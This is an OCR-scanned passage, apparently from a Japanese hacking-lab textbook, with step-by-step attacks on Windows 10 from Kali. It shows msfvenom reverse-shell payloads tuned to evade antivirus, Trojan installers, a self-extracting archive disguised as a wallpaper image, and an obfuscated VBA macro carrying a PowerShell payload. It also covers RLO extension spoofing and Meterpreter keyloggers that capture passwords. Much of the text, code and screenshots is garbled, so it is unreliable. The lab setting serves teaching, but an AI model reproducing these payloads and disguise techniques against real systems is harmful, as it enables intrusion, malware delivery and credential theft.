6 ウイ ルス 検出 シス テム に 検知 され る か 調べ る 
Kali で Firefox を 起動 し て 、VirusTotal (https://wwwr.virustotalcom/ja/) に ア 


クセ ス し ます 。'wrar560.exe (ペイ ロー ド を バイ ンド 済み ) を アッ プロ ー ド し て 


調査 する と 、11/66 と いう 結果 に な り ( 図 4.64) 。 つ まり 、66 個 の ウイ ルス 
検出 シス テム の うち 、11 個 に 引っ 掛か っ た と いう こと で す 。 逆 に いえ ば 、55 個 の 


レフ デ た SR ンズ と 車 S / の ハエ で 寺 = う ミ " ) 、 本 
ンス テム に は 検知 され な か っ だ た と いう こと で あり 、 攻 撃 の 成功 率 が 高い と も いえ 


よこ 


ーー に 
gk 9 
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py VStOtail 


ら SHA256・ daOGO9ffda15047423d134cCO2Bac15CeCaD42D65193 了 CCIbDC96BOPB2dD615279 
ファ イル 名 - waw560.gxg 
容 出 率 11 / 68 


分 町 日 基 2018-09.01 13:38.06 UTC [1 分 前 ) 


門 分 析 民 時 名 ファ イル の 詳細 @ :PI[ 博 電 基 コメ ント 0 給 茜 


ウイ ルス 対策 ソフ ト 結果 


AVaS1 WWin32- Maiare-den 
AVG Win32-Maare-en 


ム Vira (hnO CIOUO) EUPA ぬ AGEN_1020713 





4-64 VirusTotal で の 調査 結果 


7 リバ ー ス シェ ル を 待ち 受け る 
Kali で Metasploit を 起動 し て リバ ー ス シェ ル を 待ち 受け ます 。 この と き 、 ハ ンド 
ラー に は 、 ペ イロ ー ド と し て "windows/meterpreter/reverse_tcp' を 指定 し ます 。 


FootMKa11:<# mmSTCOnsole 
( 略 ) 
mmS 和 † > uSe eXpDloit/multi/handler 
msS† exploit(multi/handler) > set payl1oad windows/meterpreter/reverse tCDp 
payload => windows/meterpreter/reverse tcp 
msf exploit(multi/hand1er) > set LHOST 19.9.9.2 
LHOST => 19.9.9.2 
msf expDlo1t(multi/handler) > set LPORT 4444 
LPORT => 4444 
ms 和 † exploit(mult1/handler) > explo1t 


8⑧) バ イン ド し た ファ イル を 実行 する 
バイ ンド が 成功 し た か どう か を 確認 する た め に 、Windows 10 で Windows 
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Defender の リア ル タ イ ム 保 護 を 無効 に し ます 。 プ ブラ ウザ を 開い て 、http://10.0.0.2 
share に アク セス し て 、'wrar560exe ファ イル を ダウ ン ロ ー ド し ます 。 そ の 人 後 、 
この ファ イル を 実行 し ます 。 
Windows 10 側 で WinRAR の イン スト ー ラ ー が 立ち 上 が り 、 同 時 に Kali 側 で 
Meterpreter セ モッ ショ ン が 確立 し まし た ( 図 465) (*54)。 


CCE 生 NL = 





ーー テー qW Ir で UM amwhNmm AP mi mW 1 mm * 


IiMn 
し ーー デー 


夫 ま 記 ( ーー MMITNIAHIPN LIM 利付 ーーー- イ 電 NIIWW 
量 FUHRI (C NII NNW3IAMIAIIELN も 3 


MD IIR UM ます AEW IM Ni 
ーーー ーー ーー NT ー ーー ァ ds imdo っ wa emipe Vn む uH 


ーーw ーー ュー テー 
ーー 年 エ トーー ム ーー KNKI NN きま W 





図 4.65 ファ イル 実行 直後 の Windows 10 と Kali の 画面 


9 リアルタイム 保 護 を 有効 に し て タウ ン ロ ー ド を 試す 

和 に 、 Windows Defender の リア ル タ イ ム 保 護 を 有効 に し て 、 ダ ウン ロー ド し 志 
し ます 。 ダ ウン ロー ド 時 に は ウイ ルス 検知 され ませ ん で し た ("55)。 し か し 、 実 行 
時 に Meterpreter セ モッ ショ ン が 一 肝 確 立 し まし た が 、 振 る 姓 い が Meterpreter で あ 
る と 検知 され て し まい 、 セ ッ シ ョ ン が 閉じ て し まい まし た 


54: イ ンス トー ラー を 閉じ る と 、 セ ッ シ ョ ン も 閉じ て し まい まし た 
た 。 この ー 。 * 1 9 コ の ーー 二 た た も ーー * キ ep = 所 が N ーー 
*55: シス テム の 環境 に よっ て は 、 ダ ウン ロー ド の 時 点 で ウイ ルス 検知 きれ て し まう こと が あり ま 
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@ WinRAR で ペイ ロー ド と 画像 ファ イル を バイ ンド する 


① 画 像 ファ イル を 用 意 する 

デス クト ッ プ の 背景 画像 を ダウ ン ロ ー ド し て お きま す 。 Google で wallpaper" 
を キー ワー ド に し て 画像 検索 すれ ば 、 様 々 な 画像 ファ イル が 見 つか る は ず で す 。 
ここ で は png 形 式 の 背景 画像 を ダウ ン ロ ー ド し 、 フ ァイル 名 を "wallpaper.png' に 
し まま 。 

Kali で 画像 を 表示 する に は 、Files で ダブ ルク リッ ク す る か 、Terminal で 次 の よ 
うに 入力 し ます CS56)。 


Poot 同 ka11:<# xdg-open /root/Down1oads/wal11paper . Dng 


② 画 像 ファ イル を アイ コン ファ イル に 変換 する 
画像 ファ イル か ら ア イコ ン フ ァイル に 変換 する Web サ ービス を 利用 し ます 。 


Online ICO conyerter 


https:/ /wywwicoconverter.com 


Convert Your image to 1CO format 


https:// image.online-convert.com /convert-to-ico 


Conyert PNG to ICO and 1CNS icons online - iConyert Icons 


https://iconverticons.com/ online 





56 : xdg-open コ マン ド の 実行 時 に 画像 が 表示 され る と と も に 、EOG-WARNING" と いう 警告 
表示 され る こと が あり ます 。 次 の よう に 環境 変数 を 設定 し て お く と 、 警 告 が 表示 され な く な り ま 
す 。 


FOOot 細 ka11 :< 社 exDOort NO_AT BRTDGE=1 
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ここ で は 一 番 上 の サー ビス を 利用 し まし た 。 サ イズ は 64 ビ クセ ル 、 ビ ッ ト 深 度 
(bit depth) は 8 ビッ ト に し まし た ("57)。 生成 し た アイ コン ファ イル は "wallpaper. 
ico と し ます 。 


3 WinRAR を イン スト ー ル する 
攻撃 者 の Windows 10 に WinRAR を イン スト ー ル し ます (*58) 。 


④ ペ イロ ー ド を 作成 する 
次 の コマ ンド を 入力 し て 、 ペ イロ ー ド を 作成 し ます (*59)。 


root@ka11:<# msfvenom -a x86 -p windows/meterpreter/.」 
reverse tcp LHOST=19.9.9.2 -f exe -e x86/-」 
shikata_ga_na1 - ュ + 3 -b '\x99\x 和 ff†'" -o /root/Desktop/ evi14 . exe 


-a: アー キテ クチ ャ 。 
-e: エン コー ダー の 種類 。 
- ュ : エン コー ド 回 数 。 
-b : 避け る 文字 た ち 。 


5 バイ ンド の 設定 を する 
Windows 10 に 、 次 の 3 つの ファ イル を 集め ます 。 


* wallpaper.png (画像 ファ イル ) 
* wallpaperico'" (アイ コン ファ イル ) 
* evil4.exe (ペイ ロー ド ) 


*57: ピク セル は 、 画像 を 構成 する 最小 単位 の こと で 、 画素 と も 呼び ます 。 値 が 大 きく な る ほど 画 
像 が 大 きく な り ま す 。 ア イコ ン フ ァイル の 場合 は 、1x 1 ピク セル か ら 255 x 255 ピ クセ ル ま で に 
な り ま す (正方 形 で な く て も よい )。 ビット 深度 は 、1 単位 あたり の ビッ ト 数 で す 。 

*58 : 本 来 の 攻撃 シナ リオ で は 、 攻 撃 者 の Windows 端末 で パイ ンド 処理 を 行い ます 。 し か し 、 ここ 
で は 実験 な の で ター ゲッ ト 端 末 上 で パ バイ ンド 処理 を し て いま す 。 

*59 : Windows 10 (64bit、 日 本 語 ) に て Windows Defender の リア ル タ イ ム 保 護 を 停止 し た 状態 
で 、 こ の ペイ ロー ド が 動作 する こと を 確認 済み で す 。 





| 第 4 章 | Windows の ハッ キン プ 349 


"wallpaperpng と evil4.exe の 2 つ を 選択 し た 状態 で 、 右 クリ ッ ク し て 「Add 
to archive」 を 選び ます 。 
| Archive name and parameters」 画面 で 、 次 の 設定 を 適用 し ます ( 図 4-66)。 


[Generall タブ 


・「Archive name」 を "amazing_wallpaper.rar* に する 。 
・「Archive options] の 「Create SFX archive」 に チェ ッ ク を 入れ る 。 こ れ で 拡張 子 が 
rar か ら exe に な る 。 


[Advanced] タブ 


W 革 ・ [Run after extraction] に "evil4.exe' と "wallpaper.png' を 2 行 に 分 け て 書く 。 
| | ・「Silent mode」 は 「Hide all に チェ ッ ク す る 。 。。 6 フィ 1 


・ [Load SFX icon from the file] で 、 [Browse] ボタ ン か ら "wallpaper.ico" ファ イ 
ル を 指定 する 。 


・「Update mode] は 「Extract and update files] に チェ ッ ク す る 。 
・ [Overwrite mode」 は [Overwrite all files] に チェ ッ ク す る 。 











4-66 Archive の 設定 
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IOK」 ボタ ン で 設定 を 反映 する と 、 デ スク トッ プ に amazing_wallpaper.exe 

ディ イル が 生成 され ます 。 exe ファ イル で す が 、 ア イコ ン は アイ コン ファ イル の も 
の に な っ て いま す 。Windows の 設定 で 拡張 子 を 非 表 示 に し て いれ ば 、 見 か け 上 の 
ファ イル 名 は amazing wallpaper に な り 、 ア イコ ン 画 像 か ら 画 像 ファ イル と 誤 
認 し や すく な っ て いま す 。 

さら に 、 フ ァイル 名 を amazing_wallpaperjpgeexe の よう に 変更 すれ ば 、 


amaZing wallpaperjpg と 表示 され ます 。 


6 リバ ー ス シェ ル を 待ち 受け る 
Kali で Metasploit を 起動 し て リバ ー ス シ を 待ち 受け ます 。 この と き 、 ハ ンド 


ラー に は 、 ペ イロ ー ド と し て windows/meterpreter/reverse_tcDp を 指定 し ます . 


7 バイ ンド し た ファ イル を 実行 する 

Windows 10 で amazing wallpaper.exe ファ イル を 実行 する と 画像 ファ イル が 
表示 され ます 。 それ と 同時 に 、 Kali 側 で Meterpreter セッ ショ ン が 確立 し ます ( 図 
4-67 ) 。 画像 ファ イル を 閉じ て も 、 セ ッ シ ョ ン は 閉じ ませ ん 





図 4.6/7 ファ イル 実行 直後 の Windows 10 と Kali の 画面 
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@ Excel や Word フフ ィ イ ル に ベイ ロー ド を バイ ンド する 


Excel や Word に は マク ロ 機 能 が あり 、 そ こ に ペイ ロー ド の 実行 コー ド を 紛れ 込 
ませ る と いう 手法 が あり ます 。 


①) ペ イロ ー ド を 用 意 す る 
ペイ ロー ド は 、 す で に 作成 済み の "evil3.bat' ファ イル を 用 いま す (デス クト ッ 
プ に 保存 済み )。 


②)MacroShop を イン スト ー ル する 

MacroShop は 、MS Ofice の マク ロロ 機能 で ペイ ロー ド の 実行 を 支援 する スク リ 
プ ト を 集め た も の で す ("60)。 次 の よう に 入力 し て イン スト ー ル し ます 。 "macro_ 
safepy を 使う こと で 、 Veil で 作成 し た PowerShell 系 の ペイ ロー ド (バッ チ フ ァ イ 
ル 型 ) か ら マ クロ スク リプ ト を 生成 で きま す 。 





3⑬③ マ クロ ファ イル を 作成 する 
生成 し た スク リプ ト の 内 容 を 確認 する と 、VBA マク ロ に な っ て いる こと を 確認 
で きま す ( 図 4-68)。 





*60 : https//github.com/khrOx40sh/MacroShop 
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| ww・Ial Ln 5w sl@@@ 


5uhb wiorkbook Open(! 

'VBA arch detect *$UuO0CSted by "1T" 
ID1n Comnand As StrinQ 

Di Stf AS StFlLm9 

ID1n で xec As StFAn ロ 


rch = Emviron*PRDCESSO0R ARCHITECTURE*! 
1ndir = Environ(*wlnd1r") 
If AfCh = “AND64* Then 
Commnnd = winO1F * "Nsyswow0*vwtindowspOwershet い vi1.@WDow で rshCLL CXe" 


= "powershetL . で xe" 


^IIVPbattAEH3XVwvxCEAIULOTDKFIOALSVtOHVDFNOINw5PYn3we2K1C* 
stF = stF + "12KvrfOSvITbRPSU1io9HG 135py と 70BgCH3Sb3Z06UuysPYCv* 
St = StF + "0 け tBTVCJAULTKjOVTNOKKBNNXKEOFYi1Tb]10GEKWMvkhLTaFOLT* 


* ユ は NMY2MTRSE2w7bDu6 147+WrfcYkFevwYTnMa jncdwy/1 げ リリ" 
*s37M7FqfsnHtn2Taj50FPc3J8X31AQ5SG1NwKZTpO0034o6p7h" 
*DC う St7pSu lxboefFKVUXw92pC9HLAx91601zKeSLqtkNNz4k* 
*0UfvdeWkNGGNWFXOsq&0T6PTdae voJ+17h6Cx0D114LyY8* 
DKGKPUEOOVH32t2am3hXD 1V7E]zDbXABF+BhDGnRKY35UCmvU" 
*KBcolhULO0OUU19rAVnf+CDnULU1C2UOKARTZXA5hOPnjLO0od+* 
* 1M21K2dG4TbS4m3MUmFEL]COujvyPESOCe951bb0L jvHCbD9+1* 
"91mqj1tma2qdEYuc67NZYVSXGTf ソ は 1WRR15rF16PFdhc エ コス 7FPd” 
OLR*+REViI0OT1aZ0EKO+FXILGHOCVpz3dq0JzLA504]1KPSYT* 
"LATwSvPJYk]YZAQDItSgT/q ロ 3TDg0+ コ Sr+6KgTC48qkBc コ F1p* 
*BMNV3Tyjau0 で <B]CTPLLCMH236ETUKTeJs09yy」0OURO7e+V* 
stF = stF + "WijS5ZaYPo61qXKBayrmwT1BVtL4VyrXQVK2rIGTct6diTO+Dbb" 
StF = StF + “0OYGxTFNFOEB4/2Xe/UHS VOwTZ2kD2fhJuKS0muE て tIchROL+" 
SF = *tF + "Himh1OGWN ナ URIYVWwYwa* 


IX で て = Command + * -MioP -NonT -W Hidden -Command “*Invoke-E* 
GXGC = eXGC + “XpDFe&SLOT $(NGw-0b]GCt TODO.StFGaNRMaOef ($(New-0b* 
ec = EXeC + *]eCt IO.Commression.DeftateStream (も (Mew-0Djert * 
ICXC て = CXCC + “JO。 ・WemoryStregm (.$(IConycrt| FronBas で 03Strin0(" 
た mW と \ す 。 7 ATL Co 1 11 ーー Rm 





図 4468 マク ロス クリ プ ト の 内 容 


(攻撃 者 の ) Windows 端 末 で Excel を 起動 し ます 。 メ ニュ ー に | 開発 」 が ある こ 
と を 確認 し ます 。 な けれ ば 、 次 の 操作 を し ます 。 メ ニュ ー の 「 フ ァイル | > 「 オ 
プシ ョ ン 」 で オプ ショ ン 画 面 を 表示 し 、 左 ペイ ン の 「 リ ボン の ユー ザー 設定 ] を 
選択 し ます 。「 リ ボン の ユー ザー 設定 ] の プル ダウ ン メ ニュ ー で |「 メ イン タプ 」| を 
選択 し て 、| 開発 」 に チェ ッ ク を 入れ ます 。 す る と 、 メ ニュ ー に | 開発 」 が 現れ ま 
す 。 

メニ ュー の 「 開 発 」 > 「Visual Basicl アイ コン を 押し ます 。 す る と 、VBE 
(Visual Basic Editor) と いう VBA プ ログ ラミ ング 専用 エディ ター が 起動 し ます 。 

"ThisWorkbook" を 開い て 、"script.txt' の 内 容 を すべ て 貼り 付け ます 。 そ の 人 後 、 
ファ イル を 保存 し ます 。 マ クロ を 含む の で 拡張 子 は 「xlsm」 に な り ま す 。 こ こ で 
は "Bookl.xlsm と し まし た 。 


④ リ バー スシ ェ ル を 待ち 受け る 

Kali 側 で Metasploit を 起動 し て リバ ー ス シェ ル を 待ち 受け ます 。 この と き 、 ハン 
ドラ ー に は 、 ペ イロ ー ド と し て "windows/meterpreter/reverse_tcp を 指定 し ま 
す 。 
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5) マ クロ ファ イル を 実行 する 

ター ゲッ ト 端 末 に お いて 、 リ アル タイ ム 保 護 を 無効 に し た 状態 で 、"Bookl.xlsm' 
を ダブ ルク リッ ク し ます 。 デ フォ ルト で は マク ロ が いっ た ん 無効 に され 、 セ キュ 
リティ の 人 告 が 表示 され ます ( 図 4-69)。 


POOK 】.XIsm 


2 ン 


ゲ が リ カブ 臣 = ド ロ カッ ト 
| セキ ュ リ ティ の 甘 庄 マロ が 芋 芝 に され まし た 。 


率 


OCG = ココ つて な (OO 
| Sa 


! 





図 44.69 マク ロ を 含む ファ イル を 実行 し た と き 


[コン テン ツ の 有効 化 】 ボタ ン を 押す と マク ロ が 実行 さき れ ま す 。 数 秒 待 
つと 、Kali 側 に 反応 が あり 、Meterpreter セ モッ ショ ン が 確立 し ます ( 図 4-70)。 
Excel フ ァイル を 閉じ て も 、 セ ッ シ ョ ン は 閉じ ませ ん 。 





4-70 マク ロ 実 行 直後 の Windows と Kali の 画面 
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沙 RLO に よる 拡張 子 の 人 徐 装 
RLO (Right-to-Left Override) と は 、Unicode の 制御 文字 「U+202E] の こと で 
す 。 文字 の 流れ を 右 か ら 左 の 向き に 変え る た め に 用 いら れ ま す 。 ア ラビ ア 語 や へ 
プラ イ 語 は 、 右 か ら 左 に 向け て 記述 し ます 。 こ うし た 言語 の た め に 用 意 さ れ て い 
る 制御 文字 で す が 、 フ ァイル の 拡張 子 の 偽装 に 用 いら れる こと が あり ます 。 
例え ば 、 本 来 は "tecfdp.exe" と いう プロ グラ ム が あっ た と し ます 。c と f の 間 
に RLO を 挿入 する こと で 、 見 か け 上 "tecexepdf' と 表示 され ます 。 


代 Windows で の 実験 


① 電 卓 ア プリ を デス クト ッ プ に コピ ー す る 
C:\Windows\System32\calc.exe' ( 電 重 ア プリ ) を デス クト ッ プ に コピ ビー し ま 
す 。 


② 電 卓 ア プリ の ファ イル 名 を 変更 する 
コピ ー し た "calc.exe" を 選択 し 、 右 クリ ッ ク し て 「 名 前 の 変更 ] を 選び 、 "calcgpi 
exe と 変更 し ます 。 


3 RLO を 挿入 する 
c と 'g の 間 に カ ー ソ ル を 移動 し 、 右 クリ ッ ク し て 「Unicode 制 御 文 字 の 挿入 」 
> 「RLO」 を 選び ます ( 図 471) (*61)。 


*61: コマ ンド プロ ンプ ト で charmap コマ ンド を 入力 し て 、Character Map を 表示 し 、「202E」 を 
コピ ー し て ファ イル 名 の 文字 間 に 貼 り 付 け て も 同様 に な り ま す 。 
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Left-to・right mark 

ant-to-left mark 

cwfO widIhJOInW 

ero wicith non-IOInef 
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図 4-71 RLO の 挿入 


H 


する と 、 フ ァイル 名 が calcexejpg に な り ま す ( 図 472)。 あ た か も 、 拡 張子 が 
「jpg」 の よう に 見 えま す が 、 実 行 す る と 電卓 アプ リ が 起動 し ます 





図 4-/2 完成 し た ファ イル 名 


で Kali で の 実験 


Kalii で も RLO に よる 拡張 子 の 偽 造 を 実現 で 
イン ド 済 み の フ ァ イ ーーー ド ーーー ザ ー ム ま す 。 


1 ベイ ロー ド を バイ ンド 済み の ファ イル 名 を 変更 する 
を 右 


Files 上 で ペイ ロー ド を バイ ンド 済み の ファ イル 0 
クリ ッ ク し て |Rename」 を 選び 、 フ ァイル 名 を aexe に 変更 し ます 。 こ の 拡張 


で 


| jpg」 に 偽装 する に は 、 さ ら に agpiexe に 変更 し * す 。 
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② RLO を コピ ー す る 

ラン チャ ー の 一 番 下 の アプ リ 一 覧 を 押し ます 。 検索 入力 欄 に 「characters] と 入 
力 し 、Characters を 起動 し ます 。 左 上 の ルー プア イコ ン を 押し て 、 検 索 入 力 欄 を 
出し ます 。 そ こ に 、|202E」 と 入力 し ます 。 表 示さ れ だ た も の を 押す と 、| Unicode 
U+202E」 の 文字 画面 が 出 ま す 。[Copy Characterl ボタ ン を 押し ます ( 図 4-73) 。 





図 4-73 「Unicode U+202E」 の 文字 画面 


3 RLO を ペー スト する 


agDjexe の ファ イル 名 を 変更 し ます 。a と g の 間 に カ ー ソ ル を 移動 し て 、 
ペー スト し ます 。 す る と 、 フ ァイル 名 が "aexejpg に な り ま す 。 


(④ リ バー スシ ェ ル を 待ち 受け る 
Kali 側 で Metasploit を 起動 し て リバ ー ス シェ ル を 待ち 受け ます 。 この と き 、 ハン 


ドラ ー に は 、 ペ イロ ー ド と し て "windows/meterpreter/reverse_tcp" を 指定 し ま 
す 。 
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5) 拡 張子 を 偽装 し た ファ イル を 実行 する 

Windows 10 で "aexe.jpg ファ イル を 見 る と 、WinRAR で 設定 し た アイ コン 
( wallpaperiico ) の まま で あり 、 さ ら に 拡張 子 も jpg の よう に 見 える の で 、 一 見 し 
て 画像 ファ イル の よう に 思え ます 。 Windows 10 に お いて リア ル タ イ ム 保 護 を 無効 
に し た 状 態 で 実行 する と 、 画 像 ファ イル が 表示 され る と と も に 、Kali 側 で は 
Meterpreter セ モッ ショ ン が 確立 し ます 。 


人 で 本 来 の 拡張 子 を 確認 する 


ファ イル の プロ パテ ィ を 開け ば 、 本 来 の 拡張 子 を 簡単 に 確認 で きま す 。 exe ファ 
イル で あれ ば 、| ファ イル の 種類 ] に て | アプ リケーション (.exe)」 と な っ て いま す 
( 図 4-74)。 


開 。z/( ロ 7 の ercJjpg 


全 筐 。 吾 換 性 ぜ せ キ ュ リ ティ 詳 紀 以前 の パー ジョ ソ 


| 半 cms 


ナァ イル の 座 望 。 アプ リサ ー シ ョ ソ (し exe) 
いも axe.jD9 


に に \trst 
サイ ズ : 1.66 MB (1.951 721 リバ イロ 


ティ スク 上 1.86 MB (1.953 792 リイド 
の サイ スズ 4 


必 破 日 孔 2018 年 8 月 2 日 、 2tb2020 
中 高 日 時 2018 年 8 月 2 日 、 ac5S30 
アク セス 日 陸 :。 zo18 年 8 月 2 日 、 >tk2n2O0 


に 1 し 計 み 取り 定 用 (RN [ 屋 し ファ 7JH) | 鐘 幼 細 足 (DD。。 





図 4474 ファ イル の プロ パテ ィ で 本 来 の 拡張 子 を 確認 する 


また 、 コ マン ド プ ロン プ ト で は dir コ マン ド 、 Terminal で は ls コマ ンド で 本 来 の 
ファ イル 名 を 確認 で きま す 。 
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コマ ンド プロ ンプ ト で の 実行 





Termina1 で の 実行 





Linux で あれ ば 、 file コマ ンド で も 確認 で きま す 。 


| キー 入力 で は 指定 し に くい の で 、Tab 補 完 で 入力 する 。 


」 





沙 キー ロガー で 情報 を 右 取 す る 


キー ロガー と は 、 キ ー の 入力 を 記録 する プロ グラ ム で す 。 ハ ッ キ ング の 世界 で 
は 、 主 に パス ワー ド の 奪取 を 目的 に 用 いら れ ま す 。 


人 @ Meterpreter の 簡易 キー ロガー 


Meterpreter に は 、 キ ー ロ ガー の コマ ンド が 用 意 き れ て いま す 。 
以降 の 手順 は 、Windows 10 と Kali の 間 で ユー ザー 権限 の Meterpreter セッ ショ 
ン が 確立 し て いる こと を 前 提 と し ます 。 


(① キ ー ロ ガー を 開始 する 
keyscan_start コマンド で キー ロガー を 開始 し ます 。 
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meterpreter > keyscan_star て 


Startng the keystroke snnffer 


2 メモ 帳 に 文字 を 入力 する 


Windows 10 で メモ 帳 を 起動 し て 、 適 当 に 文字 を 人 力 し ます 。 


3 キー ロク を 表示 する 


keyscan_dump コ マン ド で 記録 し た 内 容 (キー ログ ) を 表示 し ます 。 


meterpreter > keyscan_dump 


DumDp1ing captured keystrokes . . . 


(キー ログ が 表示 され る ) 


キー ログ に は 、 英 数 字 の キー だ け で な く 、Shift や Ctrl、Enter の 入力 も 記録 され 
ます ( 図 4-75) 。 例 えば 、 改 行 は |「 く <CR>」]、 パ バック スペース は |<^H> 


す 。 バ ックス ペー ス や 全角 入力 を 考慮 し な が ら キ ー ロ グ を 解析 し な けれ ば な り ま 


Flc Et Vcw Scwch Temmied HB 





図 4475 キー ログ の ダン プ 
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(④ キー ロガー を 終了 する 
キー ロガー を 終了 する に は 、 次 の コマ ンド を 入力 し ます 。 





@keylog_recorder 


meterpreter で も 簡易 的 に キー ロガー を 有効 に で きま す が 、 本格 的 に 行う な ら 別 
の アプ ロー チ を 考え る 必要 が あり ます 。 


s* キー ロガー アプ リ を イン スト ー ル する 。 
・ Metasploit に 用 意 き れ て いる キー ロガー を 用 いる 。 


ここ で は 後者 の アプ ロー チ を 試し て み ま す 。 


①msf プ ロン プ ト に 戻る 
セッ ショ ン が 確立 済み と し て 、msf プロ ンプ ト に 戻り ます 。 
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2): キ ー ロ カー を 開始 する 
キー ロガー モジ ュー ル (post/windows/capture/keylog_recorder ) を 用 いま 
す D 


ms 和 f exDloit(multi/handler ) > use post/windows/capture/keylog_recorder 
ms 和 † post(windows/capture/keylog_ recorder) > set SESSION 1 

SESSION => 1 

mS 和 † poSst(windows/capture/keylog recorder) > show options 


Module options (post/windows/capture/keylog_ recorder) : 


Name Current Setting Required Description 

CAPTURE_ TYPE explorer nO Capture keystrokes for .」 
Explorer, Minlogon or PID (Accepted: explorer, winlogon, D1d) 

TNTERVAL 5 no Time interva1 to save 
keystrokes in seconds 

LOCKSCREEN Talse no Lock system Screen. 

MIGRATE false no Perform Migration . 

PID no ProcesSs TID to migrate to 

SESSTON 1 yes The session to run this .-」 
module on. 


msf post(windows/capture/keylog_recorder) > run 


[*] Executing module against DESKTOP-EGUBLOS 

[*] Starting the keylog recorder... 

[*] Keystrokes being saved in to /root/.msf4/1oot/29189892234798_.」 
default 19.9.9.194 host.windows .key_696138.txt 

[*] Recording keystrokes. . . キー ロガー は ター ゲッ ト 端 末 で 動作 中 。 





3 キー ロク を 確認 する 
別 Terminal を 起動 し て 、 キ ー ロ グ が 保存 され る ディ レク トリ を 確認 し ます 。 
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リア ル タ イ ム に キー ログ を 監視 する 場合 に は 、[tail |] コマ ンド を 用 いま す 。 





④ キ ー ロ ガー を 終了 する 

キー ロガー を 終了 する に は 、' 円 Recording keystrokes..′ と 表示 され て いる 
Terminal で [Ctrl] + [c] キー を 押し ます 。 す る と 、 キ ー ロ ガー の 終了 処理 が 実 
行 さ れ 、msf プロンプト に 戻り ます 。 
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Meterpreter セ ッ シ ョ ン が すぐ に 確立 され る 


リバ ー ス シェ ル の 待ち 受け 状態 に し た と き 、 数 秒 後 に 勝手 に セッ ショ ン が 確立 
する よう な 現象 が 起き た ら 、 リ バー スシ ェ ル が 自動 接続 し て いる と 考え られ ます 。 
セッ ショ ン の IP アド レス を 確認 する と 、 片 方 は Kali 側 、 も う 片 方 は パイ ロー ド の 
実行 側 に な っ て いま す 。 
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ハッ キン グ を 体験 する 
sD ェ 


MetaSploitaDle の 
ハッ キン グ 





| は じ め に / 
前 草 で は 、Windows の ハッ キン グ を 通じ て 、Kali や Metasploit の 基本 を 
に 34E き 7/ 記 
本 章 で は 、Linux の ハッ キン グ に つい て 解説 し ます 。 ハ ッ キ ング ・ ラ ボ に は 
に) に に )9【jl( に に Yo の p ED に めし る に 0 た きま 本 の を さり | 回 上 本 較 り に )( に に ] [el 
だ け で な く 、 有 名 な 攻撃 ツー ル で ある nmap や Hydra な ども 活用 し ます 。 本 
草 を 通じ て 多岐 に わた る 攻撃 を 習得 で きる で し お う 。 





ュ 
に 


か 


5-1 [ に に 1e】【e)I に 1e)【= 齋 国 |19 じ る 


ブッキング を 体験 する 


Metasploitable は 、 あ えて 脆 玉 性 が 存在 する 状態 で 構成 され た Linux で す 。 これ 
を 仮想 マシ ン で 動作 させ る こと で 、 効 率 的 か つ 安 全 に ハッ キン グ の 練習 向け シス 
テム を 構築 で きま す 。Metasploitable 2 目 体 は 古い で す が 、Linux に 対す る ハッ キ 
ング の 基本 的 な 流れ を 理解 する た め に 活用 で きま す 。 ま た 、DVWA も 内 蔵 され て 
お り 、Web ア プリ の ハッ キン グ も 体験 で きま す (1) 





沙 仮想 マシ ン に Metasploitable を イン スト ー ル する 


Metasploitable 2 を VirtualBox の 仮想 マシ ン と し て イン スト ー ル し ます 2)。 


Metasploitable 2 を タウ ン ロ ー ド する 
次 の URL か ら metasploitable-linux-200.zip ファ イル を ダウ ン ロ ー ド し ます 。 





IMetasploitable - Browse /Metasploitable2 at SourceForge.net 


https:// sourceforge.net/ Projects/metasploitablc/ files/ Metasploitable2/ 
い iiliiililililiIiHIHIEIEIEI|I|I|I|I|I|I|I|I|I|I|I|I|I|I|I』I』I ロ IQJ ガ 【JHIHIEEI 


2 タダ ウン ロー ド し た ファ イル を 展開 する 


"metasploitable-linux-2.0.0.zip'" ファ イル を 展開 する と 、"Metasploitable2-Linux" 
フォ ル ダ ー 内 に "Metasploitable-vymdk' ファ イル な ど が あり ます 


3 < 
VirtualBox を 起動 し て 、Metasploitable 用 の 仮想 マシ ン を 作成 し ます 。 


1 :DVWA を 用 いた ハッ キン グ の 実 理 に つい て は 、71 を 参照 し て くだ さい 。Metasploitable の 
DVWA は も う メ ン テ ナ ンス され て いな い の で 、DVWA を 単体 で 導入 する こと を お すす めし ま 
す 

2 : Metasploitable 3 (https//ggthub.com/rapid7/metasploitable3) も あり ます が 、 こ こ で は 有名 
な Metasploitable 2 を 用 いま す 
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名 前 : Metasploitable2 
タイ プ : LinUuX 
バー ジョ ン : Ubuntu (64-bit) 


すでに ある 仮想 ハー ド デ ィ スク ファ イル を 使用 する (ステ ッ プ ② の vmdk ファ イ 


ハー ド デ ィ スク ル を 指定 ) 





仮想 マシ ン を 作成 する と 、VirtualBox の メイ ン 画 面 の 左側 に Metasploitable の 
アイ コン が 表示 され ます ( 図 5.1)。 


」 Orac le VM VirtualBox マネ ー ジ ャ ー 
ファ fP) 。 防 代 マシ (MD へ AH] 


ゃ た ご ) | mi( 
: 計 (es に 4 こつ ー | オッ ブシ ョ ッ ト G) 縮 | 回 | 荘 i(C) 邑 | の ェ 「 
新訳 (0 設 二 (5] 選 天 吉 重 (「) マンリー ルル [AM ゴロ ー リ ルリ ー ル (G) 
Kali-Lmux-20182 (64bit 語 一 凌 | 思 フル E ュ ー ー 
細 ウド 名 前 。 slaco n able1 
ペレ ー エ ィ ン の ンス テル 、 UEunlu (Bb も 1) 
シス テム 
イット リー 8 MM ム っ 
避 休 せ 9 だ すす コ ゥ ビー 寺 学 . ハー ド デ ィ ュ ココ に に omlE に le [2 


アリ ゼラ レー ジョン VaM ネッ テッド ペー アッ が 
“ KUM 入 伯 理 


思 還 Kali-Uinux-2018.2 (54bit) の クロー ツン 
記 保 在 


Kali-Limux-2018.2 (5 邊 止 ) man 
cy 天 生 中 


ご Po153EIDAAMDI9 ーー 
の 淫 わ ティ スプレ イ 


ビデ オ ュ モリ ー 16 MMB 
リモ ー ト デス カト ゥ プ サ ー バ パー 握る 
デオ キャ プチ ャ ー: 舞う 


回 2 
コン ト 9 
DF で な 2 ペー [ 元 学 ドミ イブ 】 空 
SATH ポー ト は Is1aso igablewmdL いい 常 800 GB) 
| 記 オー ディ オ 


証 ] トド コイ パー nm 「l PanrSnimd 





図 5-1 Metasploitable の 仮想 マシ ン の 作成 完了 
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Metasploitable の 初期 設定 


1 仮想 LAN アダ ブタ ー の 設定 を する 


仮想 マシ ン の 仮想 LAN ア ダ プ ター を 次 の よう に 設定 し ます 


者 り 当 て : ホス ト オ ン リー アダ プター 


名 前 : VirtualBox Host-Only Ethernet Adapter 
